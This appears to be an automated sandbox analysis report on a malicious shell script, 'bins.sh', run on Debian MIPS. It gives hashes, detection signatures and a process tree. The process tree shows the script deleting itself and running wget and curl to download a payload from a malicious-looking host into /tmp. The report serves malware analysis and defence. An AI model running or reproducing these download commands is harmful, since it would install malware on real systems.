Analysis
-
max time kernel
149s -
max time network
9s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
05/12/2024, 07:52
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
4ec351f49dc5766e37b9f2ca107ea79f
-
SHA1
1e9e758cc6d6441d23748b0a346dcfc1df30e105
-
SHA256
c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661
-
SHA512
5371efb6490ae01946e723c37b09df490d54cc86f0b773d9b3121e608345aca8f92c18f149031f0380cca92eb021bf656abe984568c20fbe7a135211af49e60c
-
SSDEEP
192:8cfVNYb3Tjdl4z596v3m8MJeyct+8CB596v3w8MJeyhlI0VNYb3TS:8cydl1t+8ulIm
Malware Config
Signatures
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 720 curl 702 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:696
-
/bin/rm/bin/rm bins.sh2⤵PID:699
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:702
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:720
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f